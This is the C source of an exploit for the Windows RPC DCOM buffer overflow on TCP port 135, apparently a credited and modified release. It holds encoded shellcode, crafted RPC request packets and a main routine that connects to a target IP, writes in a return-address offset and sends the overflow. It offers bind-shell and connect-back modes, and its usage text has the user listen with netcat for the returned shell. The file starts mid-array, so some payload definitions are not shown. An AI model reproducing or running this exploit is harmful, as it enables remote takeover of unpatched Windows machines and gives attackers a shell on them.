rpc.txt

一份rpc溢出代码的源程序

          "\xed\xfc\xc9\xf0\xe9\xfc\x99\xda\xeb\xfc\xf8\xed\xfc\xc9\xeb\xf6"
          "\xfa\xfc\xea\xea\xd8\x99\xc9\xfc\xfc\xf2\xd7\xf8\xf4\xfc\xfd\xc9"
          "\xf0\xe9\xfc\x99\xcb\xfc\xf8\xfd\xdf\xf0\xf5\xfc\x99\xce\xeb\xf0"
          "\xed\xfc\xdf\xf0\xf5\xfc\x99\xdc\xe1\xf0\xed\xc9\xeb\xf6\xfa\xfc"
          "\xea\xea\x99\xba\xee\xea\xf6\xfa\xf2\xaa\xab\xb7\xfd\xf5\xf5\x99"
          "\xce\xca\xd8\xca\xed\xf8\xeb\xed\xec\xe9\x99\xea\xf6\xfa\xf2\xfc"
          "\xed\x99\xfb\xf0\xf7\xfd\x99\xf5\xf0\xea\xed\xfc\xf7\x99\xf8\xfa"
          "\xfa\xfc\xe9\xed\x99\xfa\xf6\xf7\xf7\xfc\xfa\xed\x99\xea\xfc\xf7"
          "\xfd\x99\xeb\xfc\xfa\xef\x99\xf0\xf6\xfa\xed\xf5\xea\xf6\xfa\xf2"
          "\xfc\xed\x99\xea\xfc\xed\xea\xf6\xfa\xf2\xf6\xe9\xed\x99\xfe\xfc"
          "\xed\xe9\xfc\xfc\xeb\xf7\xf8\xf4\xfc\x99\xfa\xf5\xf6\xea\xfc\xea"
          "\xf6\xfa\xf2\xfc\xed\x99\xfa\xf4\xfd\xb7\xfc\xe1\xfc\x99\xfc\xe1"
          "\xf0\xed\x94\x93\x99\xcd\xc1\x99\x90\x90";

unsigned char request4[]={
0x01,0x10
,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
};

int C_H(unsigned char * c,unsigned char h1,unsigned char h2)
{   int x1,x2;
    x1=0;x2=0;
    if (h1=='1') x1=1;
    if (h1=='2') x1=2;
    if (h1=='3') x1=3;
    if (h1=='4') x1=4;
    if (h1=='5') x1=5;
    if (h1=='6') x1=6;
    if (h1=='7') x1=7;
    if (h1=='8') x1=8;
    if (h1=='9') x1=9;
    if (h1=='0') x1=0;
    if ((h1=='a')||(h1=='A')) x1=10;
    if ((h1=='b')||(h1=='B')) x1=11;
    if ((h1=='c')||(h1=='C')) x1=12;
    if ((h1=='d')||(h1=='D')) x1=13;
    if ((h1=='e')||(h1=='E')) x1=14;
    if ((h1=='f')||(h1=='F')) x1=15;
    
    if (h2=='1') x2=1;
    if (h2=='2') x2=2;
    if (h2=='3') x2=3;
    if (h2=='4') x2=4;
    if (h2=='5') x2=5;
    if (h2=='6') x2=6;
    if (h2=='7') x2=7;
    if (h2=='8') x2=8;
    if (h2=='9') x2=9;
    if (h2=='0') x2=0;
    if ((h2=='a')||(h2=='A')) x2=10;
    if ((h2=='b')||(h2=='B')) x2=11;
    if ((h2=='c')||(h2=='C')) x2=12;
    if ((h2=='d')||(h2=='D')) x2=13;
    if ((h2=='e')||(h2=='E')) x2=14;
    if ((h2=='f')||(h2=='F')) x2=15;
    
     
     c[0]=(char )(x1*16+x2);
    
    }


void main(int argc,char ** argv)
{
    
    SOCKET sock;
    int len,len1,i;
#ifdef WIN32
    WSADATA WSAData;
    SOCKADDR_IN addr_in;
#else    
    struct sockaddr_in addr_in;
#endif
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];
    unsigned short port1;
    DWORD cb;
    unsigned int esp;
    unsigned int target_id;
unsigned long ret=0;

    printf("RPC DCOM overflow Vulnerability discoveried by LSD\n");
    
    printf("Code by FlashSky,Flashsky xfocus org,benjurry,benjurry xfocus org\n");
    printf("Thanks for TopHacker!Use Win32 ShellCode  (Win32sc.h) Version 1.3.0\n");
    printf("Modified and Compiled by tsing(tsingstudio@msn.com) \n");
printf("Please only use it to test your machine !!\n");
if((argc!=3)&&(argc!=4)&&(argc!=5))
{
  printf("\nUsage:%s Os[x(offset)] targetip ([bindport(1234)]|[localIP] [LocalPort]) \n",argv[0]);
  printf("%s 7 127.0.0.1 (bind 1234)\n",argv[0]);
  printf("%s 7 127.0.0.1 99 (bind 99)\n",argv[0]);
  printf("%s 7 192.168.6.1 192.168.6.2 99 (connect back 192.168.6.2 99 ,run nc -l -p LocalPort before!) \n",argv[0]);
  printf("%s x77e22c29 192.168.6.1 192.168.6.2 99 (use offset x77e22c29)\n",argv[0]);
for (len=0; targets[len].os[0] != NULL; len++)
{
printf("%s-%d\t", targets[len].os, len); 
if(len%2==0) printf("\n");

}
printf("\n");
exit(1);
}
for (len=0; targets[len].os[0] != NULL; len++){};

#ifdef WIN32
    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
        printf("WSAStartup error.Error:%d\n",WSAGetLastError());
        return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[2]);
    
    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
        printf("Socket failed.Error:%d\n",WSAGetLastError());
        return;
    }
    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
        printf("Connect failed.Error:%d",WSAGetLastError());
        return;
    }
    
#else
if ((sock=socket(AF_INET,SOCK_STREAM,0)) == -1)
{
perror("- Socket");
return(0);
}
addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
  addr_in.sin_addr.s_addr = inet_addr(argv[2]);
if(connect(sock,(struct sockaddr *)&addr_in, sizeof(addr_in)) != 0)
{
perror("- Connect");
return(0);
}
#endif
    if (argc==5){
    
    SH_WORKEXIT(1);     // Terminate Process
    SH_WORKMODE(SH_WORKMODE_CALLBACK);
    SH_WORKHOST(inet_addr(argv[3]));
    SH_WORKPORT(atoi(argv[4]));
    }
    if(argc==3)
    {
    SH_WORKEXIT(1);       // Terminate Process
    SH_WORKMODE(SH_WORKMODE_BIND);
    SH_WORKPORT(1234);
    }
    if(argc==4)
    {
        SH_WORKEXIT(1);       // Terminate Process
    SH_WORKMODE(SH_WORKMODE_BIND);
    SH_WORKPORT(atoi(argv[3]));
    }

    if(argv[1][0]!='x')
    {
    //strncpy(sc+36,"\x4d\x3f\xe3\x77\x38\x90\xe6\x77\x0d\x90\xe6\x77",12);    
    target_id = atoi(argv[1]);
    if ((target_id!=8888)&&(target_id>=0)&&(target_id<len)){
        ret = targets[target_id].offset;
    }
    if (target_id==8888)
    {
        //I delete this code 
        // because of www.metasploit.com has publish how to get it
        
       
    }
    
        

    }
    else{
     for (i=0;i<4;i++) 
C_H((unsigned char *)(&ret)+(3-i),argv[1][i*2+1],argv[1][i*2+2]);
    memcpy(sc+36, (unsigned char *) &ret, 4);
    }
    if(ret!=0)    memcpy(sc+36, (unsigned char *) &ret, 4);
    else 
    
    {
        printf("Need correct offset!\n");
    exit(1);
    }
    strncpy(sc+48,ShellCode,1976);
    len=sizeof(sc);
//    len=716;
    memcpy(buf2,request1,sizeof(request1));
    len1=sizeof(request1);
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sc)/2;  
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sc)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sc,sizeof(sc));
    len1=len1+sizeof(sc);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+sizeof(sc)-0xc;
   
    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+sizeof(sc)-0xc;  
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+sizeof(sc)-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+sizeof(sc)-0xc;
    
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
#ifdef WIN32
        printf("Send failed.Error:%d\n",WSAGetLastError());
#else
        perror("- Send");
#endif
            return;
    }
    
    len=recv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
    {
#ifdef WIN32
        printf("Send failed.Error:%d\n",WSAGetLastError());
#else
        perror("- Send");
#endif            return;
    }
    len=recv(sock,buf1,1024,NULL);
    
    if(len!=-1)
    {
    printf("Failed! Maybe have patched!\n");
    }
    else
    {
    printf("overflow Success !(if can't get shell ,try  other offset ..... @.@....)\n");
    }
}